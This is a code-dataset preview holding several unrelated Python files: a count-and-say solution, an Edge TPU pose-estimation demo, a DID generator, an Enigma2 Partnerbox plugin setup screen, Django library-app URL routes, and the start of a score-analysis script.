filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_30530 | """
Runtime: 44 ms, faster than 92.75% of Python3 online submissions for Count and Say.
Memory Usage: 14.1 MB, less than 36.67% of Python3 online submissions for Count and Say.
"""
from typing import List
from typing import Optional
class Solution:
def countAndSay(self, n: int) -> str:
if n==1:
return '1'
else:
string = self.countAndSay(n-1)
if len(string)==1:
return '1'+str(string[0])
say = ''
counter = 1
for idx, char in enumerate(string):
if idx == 0:
continue
if char != string[idx-1]:
say = say + str(counter) + str(string[idx-1])
counter = 1
else:
counter += 1
if counter != 0:
say = say + str(counter) + str(string[-1])
return say
def main():
sol = Solution()
print('Output:', sol.countAndSay(4))
print('Expected:', '1211')
if __name__ == "__main__":
main()
|
the-stack_106_30532 | import sys
import argparse
import numpy as np
import cv2
import time
#from edgetpu.detection.engine import DetectionEngine
from edgetpu.basic.basic_engine import BasicEngine
keypointsMapping = ['Nose', 'Neck', 'R-Sho', 'R-Elb', 'R-Wr', 'L-Sho', 'L-Elb', 'L-Wr', 'R-Hip', 'R-Knee', 'R-Ank', 'L-Hip', 'L-Knee', 'L-Ank', 'R-Eye', 'L-Eye', 'R-Ear', 'L-Ear']
POSE_PAIRS = [[1,2], [1,5], [2,3], [3,4], [5,6], [6,7], [1,8], [8,9], [9,10], [1,11], [11,12], [12,13], [1,0], [0,14], [14,16], [0,15], [15,17], [2,17], [5,16]]
mapIdx = [[31,32], [39,40], [33,34], [35,36], [41,42], [43,44], [19,20], [21,22], [23,24], [25,26], [27,28], [29,30], [47,48], [49,50], [53,54], [51,52], [55,56], [37,38], [45,46]]
colors = [[0,100,255], [0,100,255], [0,255,255], [0,100,255], [0,255,255], [0,100,255], [0,255,0], [255,200,100], [255,0,255], [0,255,0], [255,200,100], [255,0,255], [0,0,255], [255,0,0], [200,200,0], [255,0,0], [200,200,0], [0,0,0]]
def getKeypoints(probMap, threshold=0.1):
mapSmooth = cv2.GaussianBlur(probMap, (3, 3), 0, 0)
mapMask = np.uint8(mapSmooth>threshold)
keypoints = []
contours = None
try:
#OpenCV4.x
contours, _ = cv2.findContours(mapMask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
except:
#OpenCV3.x
_, contours, _ = cv2.findContours(mapMask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
blobMask = np.zeros(mapMask.shape)
blobMask = cv2.fillConvexPoly(blobMask, cnt, 1)
maskedProbMap = mapSmooth * blobMask
_, maxVal, _, maxLoc = cv2.minMaxLoc(maskedProbMap)
keypoints.append(maxLoc + (probMap[maxLoc[1], maxLoc[0]],))
return keypoints
def getValidPairs(outputs, w, h, detected_keypoints):
valid_pairs = []
invalid_pairs = []
n_interp_samples = 10
paf_score_th = 0.1
conf_th = 0.7
for k in range(len(mapIdx)):
pafA = outputs[0, mapIdx[k][0], :, :]
pafB = outputs[0, mapIdx[k][1], :, :]
pafA = cv2.resize(pafA, (w, h))
pafB = cv2.resize(pafB, (w, h))
candA = detected_keypoints[POSE_PAIRS[k][0]]
candB = detected_keypoints[POSE_PAIRS[k][1]]
nA = len(candA)
nB = len(candB)
if( nA != 0 and nB != 0):
valid_pair = np.zeros((0,3))
for i in range(nA):
max_j=-1
maxScore = -1
found = 0
for j in range(nB):
d_ij = np.subtract(candB[j][:2], candA[i][:2])
norm = np.linalg.norm(d_ij)
if norm:
d_ij = d_ij / norm
else:
continue
interp_coord = list(zip(np.linspace(candA[i][0], candB[j][0], num=n_interp_samples),
np.linspace(candA[i][1], candB[j][1], num=n_interp_samples)))
paf_interp = []
for k in range(len(interp_coord)):
paf_interp.append([pafA[int(round(interp_coord[k][1])), int(round(interp_coord[k][0]))],
pafB[int(round(interp_coord[k][1])), int(round(interp_coord[k][0]))] ])
paf_scores = np.dot(paf_interp, d_ij)
avg_paf_score = sum(paf_scores)/len(paf_scores)
if ( len(np.where(paf_scores > paf_score_th)[0]) / n_interp_samples ) > conf_th :
if avg_paf_score > maxScore:
max_j = j
maxScore = avg_paf_score
found = 1
if found:
valid_pair = np.append(valid_pair, [[candA[i][3], candB[max_j][3], maxScore]], axis=0)
valid_pairs.append(valid_pair)
else:
invalid_pairs.append(k)
valid_pairs.append([])
return valid_pairs, invalid_pairs
def getPersonwiseKeypoints(valid_pairs, invalid_pairs, keypoints_list):
personwiseKeypoints = -1 * np.ones((0, 19))
for k in range(len(mapIdx)):
if k not in invalid_pairs:
partAs = valid_pairs[k][:,0]
partBs = valid_pairs[k][:,1]
indexA, indexB = np.array(POSE_PAIRS[k])
for i in range(len(valid_pairs[k])):
found = 0
person_idx = -1
for j in range(len(personwiseKeypoints)):
if personwiseKeypoints[j][indexA] == partAs[i]:
person_idx = j
found = 1
break
if found:
personwiseKeypoints[person_idx][indexB] = partBs[i]
personwiseKeypoints[person_idx][-1] += keypoints_list[partBs[i].astype(int), 2] + valid_pairs[k][i][2]
elif not found and k < 17:
row = -1 * np.ones(19)
row[indexA] = partAs[i]
row[indexB] = partBs[i]
row[-1] = sum(keypoints_list[valid_pairs[k][i,:2].astype(int), 2]) + valid_pairs[k][i][2]
personwiseKeypoints = np.vstack([personwiseKeypoints, row])
return personwiseKeypoints
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--model", default="models/train/test/tpu/mobilenet_v2_0.75_224/output_tflite_graph_edgetpu.tflite", help="Path of the inference model.")
parser.add_argument("--usbcamno", type=int, default=0, help="USB Camera number.")
parser.add_argument("--usbcamfps", type=int, default=30, help="USB Camera FPS.")
args = parser.parse_args()
camera_width = 320
camera_height = 240
fps = ""
framecount = 0
time1 = 0
elapsedTime = 0
h = 368
w = 432
new_w = int(camera_width * min(w/camera_width, h/camera_height))
new_h = int(camera_height * min(w/camera_width, h/camera_height))
threshold = 0.1
nPoints = 18
cap = cv2.VideoCapture(args.usbcamno)
cap.set(cv2.CAP_PROP_FPS, args.usbcamfps)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
cv2.namedWindow("USB Camera", cv2.WINDOW_AUTOSIZE)
# Initialize engine.
engine = BasicEngine(args.model)
# Run inference.
while True:
t1 = time.perf_counter()
ret, color_image = cap.read()
if not ret:
break
resized_image = cv2.resize(color_image, (new_w, new_h), interpolation = cv2.INTER_CUBIC)
prepimg = resized_image[:, :, ::-1].copy()
canvas = np.full((h, w, 3), 128)
canvas[(h - new_h)//2:(h - new_h)//2 + new_h,(w - new_w)//2:(w - new_w)//2 + new_w, :] = resized_image
prepimg = np.uint8(canvas).flatten()
#tinf = time.perf_counter()
#ans = engine.DetectWithImage(prepimg, threshold=0.5, keep_aspect_ratio=True, relative_coord=False, top_k=10)
#print("engine.required_input_array_size()=", engine.required_input_array_size()) #476928
#print("prepimg.flatten()=", len(prepimg)) #476928
ans = engine.RunInference(prepimg)
#print("len(ans)=", len(ans)) #2
#print("ans[0]=", ans[0]) #3.071000099182129
#print("ans[1]=", ans[1]) #[0.04705882 0.09411765 0.04705882 ... 0.07058824 0.23529412 0. ]
#print("len(ans[1])=", len(ans[1])) #141588=1x46x54x57 or 1x57x46x54
outputs = ans[1].reshape((1, 46, 54, 57)).transpose((0, 3, 1, 2)) #(1, 57, 46, 54)
#outputs = outputs[np.newaxis, :, :, :]
#outputs = ans[1].reshape((1, 57, 46, 54)) #(1, 57, 46, 54)
#print(time.perf_counter() - tinf, "sec")
#sys.exit(0)
detected_keypoints = []
keypoints_list = np.zeros((0, 3))
keypoint_id = 0
for part in range(nPoints):
probMap = outputs[0, part, :, :]
probMap = cv2.resize(probMap, (w, h)) # (432, 368)
keypoints = getKeypoints(probMap, threshold)
keypoints_with_id = []
for i in range(len(keypoints)):
keypoints_with_id.append(keypoints[i] + (keypoint_id,))
keypoints_list = np.vstack([keypoints_list, keypoints[i]])
keypoint_id += 1
detected_keypoints.append(keypoints_with_id)
frameClone = np.uint8(canvas.copy())
for i in range(nPoints):
for j in range(len(detected_keypoints[i])):
cv2.circle(frameClone, detected_keypoints[i][j][0:2], 5, colors[i], -1, cv2.LINE_AA)
valid_pairs, invalid_pairs = getValidPairs(outputs, w, h, detected_keypoints)
personwiseKeypoints = getPersonwiseKeypoints(valid_pairs, invalid_pairs, keypoints_list)
for i in range(17):
for n in range(len(personwiseKeypoints)):
index = personwiseKeypoints[n][np.array(POSE_PAIRS[i])]
if -1 in index:
continue
B = np.int32(keypoints_list[index.astype(int), 0])
A = np.int32(keypoints_list[index.astype(int), 1])
cv2.line(frameClone, (B[0], A[0]), (B[1], A[1]), colors[i], 3, cv2.LINE_AA)
cv2.putText(frameClone, fps, (w-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.imshow("USB Camera" , frameClone)
if cv2.waitKey(1)&0xFF == ord('q'):
break
# FPS calculation
framecount += 1
if framecount >= 5:
fps = "(Playback) {:.1f} FPS".format(time1/15)
framecount = 0
time1 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
|
the-stack_106_30533 | import os
import logging
import base64
import argparse
import asyncio
import sys
# Import server.anchor from the path relative to where the scripts are being executed.
sys.path.insert(1, './server')
from anchor import AnchorHandle
logging.getLogger().setLevel(logging.ERROR)
async def generate_did(seed):
TRUST_ANCHOR = AnchorHandle()
did, verkey = await TRUST_ANCHOR.seed_to_did(seed)
print(f"\nSeed: {seed}")
print(f"DID: {did}")
print(f"Verkey: {verkey}")
def main(seed):
loop = asyncio.get_event_loop()
loop.run_until_complete(generate_did(seed))
loop.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Generates a DID and Verkey from a Seed.")
parser.add_argument("--seed", required=True, default=os.environ.get('SEED'), help="The seed to use to generate the DID and Verkey.")
args, unknown = parser.parse_known_args()
testseed = args.seed
if testseed.endswith("="):
testseed = base64.b64decode(testseed).decode("ascii")
if not len(testseed) == 32:
print("Seed must be 32 characters long.")
exit()
main(args.seed) |
the-stack_106_30534 | from __future__ import absolute_import
#
# Partnerbox E2
#
# $Id$
#
# Coded by Dr.Best (c) 2009
# Support: www.dreambox-tools.info
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
from enigma import eListboxPythonMultiContent, eListbox, gFont, \
RT_HALIGN_LEFT, RT_VALIGN_CENTER, getDesktop
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.MenuList import MenuList
from Components.Button import Button
from Components.config import config
from Components.ActionMap import ActionMap, NumberActionMap
from Components.ConfigList import ConfigList, ConfigListScreen
from Components.config import ConfigSubsection, ConfigSubList, ConfigIP, ConfigInteger, ConfigSelection, ConfigText, ConfigYesNo, getConfigListEntry, configfile
import skin
# for localized messages
from . import _
def initPartnerboxEntryConfig():
config.plugins.Partnerbox.Entries.append(ConfigSubsection())
i = len(config.plugins.Partnerbox.Entries) - 1
config.plugins.Partnerbox.Entries[i].name = ConfigText(default="Remote box", visible_width=50, fixed_size=False)
config.plugins.Partnerbox.Entries[i].ip = ConfigIP(default=[192, 168, 0, 98])
config.plugins.Partnerbox.Entries[i].port = ConfigInteger(default=80, limits=(1, 65555))
config.plugins.Partnerbox.Entries[i].enigma = ConfigSelection(default="0", choices=[("0", _("Enigma 2")), ("1", _("Enigma 1"))])
config.plugins.Partnerbox.Entries[i].password = ConfigText(default="root", visible_width=50, fixed_size=False)
config.plugins.Partnerbox.Entries[i].useinternal = ConfigSelection(default="1", choices=[("0", _("use external")), ("1", _("use internal"))])
config.plugins.Partnerbox.Entries[i].zaptoservicewhenstreaming = ConfigYesNo(default=True)
return config.plugins.Partnerbox.Entries[i]
def initConfig():
count = config.plugins.Partnerbox.entriescount.value
if count != 0:
i = 0
while i < count:
initPartnerboxEntryConfig()
i += 1
HD = False
if getDesktop(0).size().width() >= 1280:
HD = True
class PartnerboxSetup(ConfigListScreen, Screen):
if HD:
skin = """ <screen position="center,center" size="700,400" title="Partnerbox Setup" >
<widget name="config" position="10,10" size="680,330" scrollbarMode="showOnDemand" />
<widget name="key_red" position="10,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;17"/>
<widget name="key_green" position="300,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;17"/>
<widget name="key_yellow" position="550,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;17"/>
<ePixmap name="red" pixmap="skin_default/buttons/red.png" position="10,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="green" pixmap="skin_default/buttons/green.png" position="300,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="yellow" pixmap="skin_default/buttons/yellow.png" position="550,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
</screen>"""
else:
skin = """ <screen position="center,center" size="550,400" title="Partnerbox Setup" >
<widget name="config" position="20,10" size="510,330" scrollbarMode="showOnDemand" />
<widget name="key_red" position="0,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<widget name="key_green" position="140,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<widget name="key_yellow" position="280,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<ePixmap name="red" pixmap="skin_default/buttons/red.png" position="0,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="green" pixmap="skin_default/buttons/green.png" position="140,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="yellow" pixmap="skin_default/buttons/yellow.png" position="280,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
</screen>"""
def __init__(self, session, args=None):
Screen.__init__(self, session)
self.setTitle(_("Partnerbox Setup"))
self["key_red"] = Button(_("Cancel"))
self["key_green"] = Button(_("OK"))
self["key_yellow"] = Button(_("Partnerbox Entries"))
ConfigListScreen.__init__(self, [])
self.initConfig()
self["setupActions"] = ActionMap(["SetupActions", "ColorActions"],
{
"green": self.keySave,
"cancel": self.keyClose,
"red": self.keyClose,
"ok": self.keySave,
"yellow": self.PartnerboxEntries,
}, -2)
def initConfig(self):
self.list = []
self.list.append(getConfigListEntry(_("Show 'RemoteTimer' in Eventinfo menu"), config.plugins.Partnerbox.enablepartnerboxeventinfomenu))
if config.plugins.Partnerbox.enablepartnerboxeventinfomenu.value:
self.list.append(getConfigListEntry(_("Show 'RemoteTimer' in Event View context menu"), config.plugins.Partnerbox.enablepartnerboxeventinfocontextmenu))
self.list.append(getConfigListEntry(_("Show 'RemoteTimer' in E-Menu"), config.plugins.Partnerbox.showremotetimerinextensionsmenu))
self.list.append(getConfigListEntry(_("Show 'RemoteTV Player' in E-Menu"), config.plugins.Partnerbox.showremotetvinextensionsmenu))
self.list.append(getConfigListEntry(_("Show 'Stream current Service' in E-Menu"), config.plugins.Partnerbox.showcurrentstreaminextensionsmenu))
self.list.append(getConfigListEntry(_("Enable Partnerbox-Function in TimerEvent"), config.plugins.Partnerbox.enablepartnerboxintimerevent))
if config.plugins.Partnerbox.enablepartnerboxintimerevent.value:
self.list.append(getConfigListEntry(_("Enable first Partnerbox-entry in Timeredit as default"), config.plugins.Partnerbox.enabledefaultpartnerboxintimeredit))
self.list.append(getConfigListEntry(_("Enable VPS-Function in TimerEvent"), config.plugins.Partnerbox.enablevpsintimerevent))
self.list.append(getConfigListEntry(_("Enable Partnerbox-Function in EPGList"), config.plugins.Partnerbox.enablepartnerboxepglist))
if config.plugins.Partnerbox.enablepartnerboxepglist.value:
self.list.append(getConfigListEntry(_("Enable Red Button-Function in single/multi EPG"), config.plugins.Partnerbox.enablepartnerboxzapbuton))
self.list.append(getConfigListEntry(_("Show duration time for event"), config.plugins.Partnerbox.showremaingepglist))
self.list.append(getConfigListEntry(_("Show all icon for event in EPGList"), config.plugins.Partnerbox.allicontype))
self.list.append(getConfigListEntry(_("Enable Partnerbox-Function in Channel Selector"), config.plugins.Partnerbox.enablepartnerboxchannelselector))
self["config"].l.setList(self.list)
def keySave(self):
config.plugins.Partnerbox.showremotetvinextensionsmenu.save()
config.plugins.Partnerbox.showcurrentstreaminextensionsmenu.save()
config.plugins.Partnerbox.showremotetimerinextensionsmenu.save()
config.plugins.Partnerbox.enablepartnerboxintimerevent.save()
config.plugins.Partnerbox.enablepartnerboxepglist.save()
config.plugins.Partnerbox.enablepartnerboxzapbuton.save()
config.plugins.Partnerbox.enablepartnerboxchannelselector.save()
config.plugins.Partnerbox.enabledefaultpartnerboxintimeredit.save()
config.plugins.Partnerbox.enablepartnerboxeventinfomenu.save()
config.plugins.Partnerbox.enablepartnerboxeventinfocontextmenu.save()
config.plugins.Partnerbox.allicontype.save()
config.plugins.Partnerbox.showremaingepglist.save()
configfile.save()
self.refreshPlugins()
self.close(self.session)
def keyClose(self):
for x in self["config"].list:
x[1].cancel()
self.close(self.session)
def PartnerboxEntries(self):
self.session.open(PartnerboxEntriesListConfigScreen)
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.initConfig()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.initConfig()
def refreshPlugins(self):
from Components.PluginComponent import plugins
from Tools.Directories import SCOPE_PLUGINS, resolveFilename
plugins.clearPluginList()
plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
class PartnerboxEntriesListConfigScreen(Screen):
skin = """
<screen position="center,center" size="550,400" title="Partnerbox: List of Entries" >
<widget name="name" position="5,0" size="200,50" font="Regular;20" halign="left"/>
<widget name="ip" position="215,0" size="140,50" font="Regular;20" halign="left"/>
<widget name="port" position="350,0" size="80,50" font="Regular;20" halign="left"/>
<widget name="type" position="430,0" size="120,50" font="Regular;20" halign="left"/>
<widget name="entrylist" position="0,50" size="550,300" scrollbarMode="showOnDemand"/>
<widget name="key_red" position="0,350" size="140,40" zPosition="5" valign="center" halign="center" backgroundColor="red" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_yellow" position="280,350" size="140,40" zPosition="5" valign="center" halign="center" backgroundColor="yellow" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_green" position="140,350" size="140,40" zPosition="5" valign="center" halign="center" backgroundColor="green" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_blue" position="420,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<ePixmap name="red" position="0,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/red.png" transparent="1" alphatest="on" />
<ePixmap name="yellow" position="280,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/yellow.png" transparent="1" alphatest="on" />
<ePixmap name="green" position="140,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/green.png" transparent="1" alphatest="on" />
<ePixmap name="blue" position="420,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/blue.png" transparent="1" alphatest="on" />
</screen>"""
def __init__(self, session, what=None):
Screen.__init__(self, session)
self.session = session
self.setTitle(_("Partnerbox: List of Entries"))
self["name"] = Button(_("Name"))
self["ip"] = Button(_("IP"))
self["port"] = Button(_("Port"))
self["type"] = Button(_("Enigma Type"))
self["key_red"] = Button(_("Add"))
self["key_yellow"] = Button(_("Edit"))
self["key_green"] = Button(_("Power"))
self["key_blue"] = Button(_("Delete"))
self["entrylist"] = PartnerboxEntryList([])
self["actions"] = ActionMap(["WizardActions", "MenuActions", "ShortcutActions"],
{
"ok": self.keyOK,
"back": self.keyClose,
"red": self.keyRed,
"yellow": self.keyYellow,
"blue": self.keyDelete,
"green": self.powerMenu,
}, -1)
self.what = what
self.updateList()
def updateList(self):
self["entrylist"].buildList()
def keyClose(self):
self.close(self.session, self.what, None)
def keyRed(self):
self.session.openWithCallback(self.updateList, PartnerboxEntryConfigScreen, None)
def keyOK(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
nr = int(config.plugins.Partnerbox.entriescount.value)
if nr > 1 and self.what == 2 or nr >= 1 and self.what == None:
from .plugin import RemoteTimer
self.session.open(RemoteTimer, sel)
else:
self.close(self.session, self.what, sel)
def keyYellow(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
self.session.openWithCallback(self.updateList, PartnerboxEntryConfigScreen, sel)
def keyDelete(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
self.session.openWithCallback(self.deleteConfirm, MessageBox, _("Really delete this Partnerbox Entry?"))
def deleteConfirm(self, result):
if not result:
return
sel = self["entrylist"].l.getCurrentSelection()[0]
config.plugins.Partnerbox.entriescount.value = config.plugins.Partnerbox.entriescount.value - 1
config.plugins.Partnerbox.entriescount.save()
config.plugins.Partnerbox.Entries.remove(sel)
config.plugins.Partnerbox.Entries.save()
config.plugins.Partnerbox.save()
configfile.save()
self.updateList()
def powerMenu(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
menu = []
menu.append((_("Wakeup"), 0))
menu.append((_("Standby"), 1))
menu.append((_("Restart enigma"), 2))
menu.append((_("Restart"), 3))
if int(sel.enigma.value) == 0:
menu.append((_("Toggle Standby"), 4))
menu.append((_("Deep Standby"), 5))
else:
menu.append((_("Shutdown"), 4))
from Screens.ChoiceBox import ChoiceBox
self.session.openWithCallback(self.menuCallback, ChoiceBox, title=(_("Select operation for partnerbox") + ": " + "%s" % (sel.name.value)), list=menu)
def menuCallback(self, choice):
if choice is None:
return
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
password = sel.password.value
username = "root"
ip = "%d.%d.%d.%d" % tuple(sel.ip.value)
port = sel.port.value
http = "http://%s:%d" % (ip, port)
enigma_type = int(sel.enigma.value)
sCommand = http
sCommand += enigma_type and "/cgi-bin/admin?command=" or "/web/powerstate?newstate="
if choice[1] == 0:
sCommand += enigma_type and "wakeup" or "4"
elif choice[1] == 1:
sCommand += enigma_type and "standby" or "5"
elif choice[1] == 2:
sCommand += enigma_type and "restart" or "3"
elif choice[1] == 3:
sCommand += enigma_type and "reboot" or "2"
elif choice[1] == 4:
sCommand += enigma_type and "shutdown" or "0"
elif choice[1] == 5:
if enigma_type:
return
sCommand += "1"
else:
return
from .PartnerboxFunctions import sendPartnerBoxWebCommand
sendPartnerBoxWebCommand(sCommand, None, 3, username, password)
class PartnerboxEntryList(MenuList):
def __init__(self, list, enableWrapAround=True):
MenuList.__init__(self, list, enableWrapAround, eListboxPythonMultiContent)
font = skin.fonts.get("PartnerBoxEntryList0", ("Regular", 20, 20))
self.l.setFont(0, gFont(font[0], font[1]))
self.ItemHeight = int(font[2])
font = skin.fonts.get("PartnerBoxEntryList1", ("Regular", 18))
self.l.setFont(1, gFont(font[0], font[1]))
def postWidgetCreate(self, instance):
MenuList.postWidgetCreate(self, instance)
instance.setItemHeight(self.ItemHeight)
def buildList(self):
self.list = []
for c in config.plugins.Partnerbox.Entries:
res = [c]
x, y, w, h = skin.parameters.get("PartnerBoxEntryListName", (5, 0, 150, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(c.name.value)))
ip = "%d.%d.%d.%d" % tuple(c.ip.value)
x, y, w, h = skin.parameters.get("PartnerBoxEntryListIP", (120, 0, 150, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(ip)))
port = "%d" % (c.port.value)
x, y, w, h = skin.parameters.get("PartnerBoxEntryListPort", (270, 0, 100, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(port)))
if int(c.enigma.value) == 0:
e_type = "Enigma2"
else:
e_type = "Enigma1"
x, y, w, h = skin.parameters.get("PartnerBoxEntryListType", (410, 0, 100, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(e_type)))
self.list.append(res)
self.l.setList(self.list)
self.moveToIndex(0)
class PartnerboxEntryConfigScreen(ConfigListScreen, Screen):
skin = """
<screen name="PartnerboxEntryConfigScreen" position="center,center" size="550,400" title="Partnerbox: Edit Entry">
<widget name="config" position="20,10" size="520,330" scrollbarMode="showOnDemand" />
<ePixmap name="red" position="0,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/red.png" transparent="1" alphatest="on" />
<ePixmap name="green" position="140,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/green.png" transparent="1" alphatest="on" />
<ePixmap name="blue" position="420,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/blue.png" transparent="1" alphatest="on" />
<widget name="key_red" position="0,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_green" position="140,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_blue" position="420,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, entry):
self.session = session
Screen.__init__(self, session)
self.setTitle(_("Partnerbox: Edit Entry"))
self["actions"] = ActionMap(["SetupActions", "ColorActions"],
{
"green": self.keySave,
"red": self.keyCancel,
"blue": self.keyDelete,
"cancel": self.keyCancel
}, -2)
self["key_red"] = Button(_("Cancel"))
self["key_green"] = Button(_("OK"))
self["key_blue"] = Button(_("Delete"))
if entry is None:
self.newmode = 1
self.current = initPartnerboxEntryConfig()
else:
self.newmode = 0
self.current = entry
cfglist = [
getConfigListEntry(_("Name"), self.current.name),
getConfigListEntry(_("IP"), self.current.ip),
getConfigListEntry(_("Port"), self.current.port),
getConfigListEntry(_("Enigma Type"), self.current.enigma),
getConfigListEntry(_("Password"), self.current.password),
getConfigListEntry(_("Servicelists/EPG"), self.current.useinternal),
getConfigListEntry(_("Zap to service when streaming"), self.current.zaptoservicewhenstreaming)
]
ConfigListScreen.__init__(self, cfglist, session)
def keySave(self):
if self.newmode == 1:
config.plugins.Partnerbox.entriescount.value = config.plugins.Partnerbox.entriescount.value + 1
config.plugins.Partnerbox.entriescount.save()
ConfigListScreen.keySave(self)
config.plugins.Partnerbox.save()
configfile.save()
self.close()
def keyCancel(self):
if self.newmode == 1:
config.plugins.Partnerbox.Entries.remove(self.current)
ConfigListScreen.cancelConfirm(self, True)
def keyDelete(self):
if self.newmode == 1:
self.keyCancel()
else:
self.session.openWithCallback(self.deleteConfirm, MessageBox, _("Really delete this Partnerbox Entry?"))
def deleteConfirm(self, result):
if not result:
return
config.plugins.Partnerbox.entriescount.value = config.plugins.Partnerbox.entriescount.value - 1
config.plugins.Partnerbox.entriescount.save()
config.plugins.Partnerbox.Entries.remove(self.current)
config.plugins.Partnerbox.Entries.save()
config.plugins.Partnerbox.save()
configfile.save()
self.close()
|
the-stack_106_30536 | from django.urls import path
from . import views
urlpatterns = [
path("book/", views.BookViewSet.as_view({'get': 'list'})),
path("book/<int:pk>/", views.BookViewSet.as_view({'get': 'retrieve'})),
path("book/create", views.BookViewSet.as_view({'post': 'create'})),
path("book/<int:pk>/delete", views.BookViewSet.as_view({'delete': 'destroy'})),
path("book/<int:pk>/update", views.BookViewSet.as_view({'post': 'update'})),
path("reader/", views.ReaderViewSet.as_view({'get': 'list'})),
path("reader/<int:pk>/", views.ReaderViewSet.as_view({'get': 'retrieve'})),
path("reader/create", views.ReaderViewSet.as_view({'post': 'create'})),
path("reader/<int:pk>/delete", views.ReaderViewSet.as_view({'delete': 'destroy'})),
path("reader/<int:pk>/update", views.ReaderViewSet.as_view({'post': 'update'})),
path("taking_book/", views.TakingBookViewSet.as_view({'get': 'list'})),
path("taking_book/<int:pk>/", views.TakingBookViewSet.as_view({'get': 'retrieve'})),
path("taking_book/create", views.TakingBookViewSet.as_view({'post': 'create'})),
path("taking_book/<int:pk>/delete", views.TakingBookViewSet.as_view({'delete': 'destroy'})),
path("taking_book/<int:pk>/update", views.TakingBookViewSet.as_view({'post': 'update'})),
path("book_place/", views.BookPlaceViewSet.as_view({'get': 'list'})),
path("book_place/<int:pk>/", views.BookPlaceViewSet.as_view({'get': 'retrieve'})),
path("book_place/create", views.BookPlaceViewSet.as_view({'post': 'create'})),
path("book_place/<int:pk>/delete", views.BookPlaceViewSet.as_view({'delete': 'destroy'})),
path("book_place/<int:pk>/update", views.BookPlaceViewSet.as_view({'post': 'update'})),
path("reading_room/", views.ReadingRoomViewSet.as_view({'get': 'list'})),
path("reading_room/<int:pk>/", views.ReadingRoomViewSet.as_view({'get': 'retrieve'})),
path('query1/', views.Query1.as_view()),
path('query5/', views.Query5.as_view()),
]
|
the-stack_106_30538 | from statistics import mean
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from collections import deque
import os
import csv
import numpy as np
NUMBER_RUNS = 17
class ScoreAnalyst:
def __init__(self, nb_runs):
self.nb_runs = nb_runs
self.score_csv_root_path = "scores_"
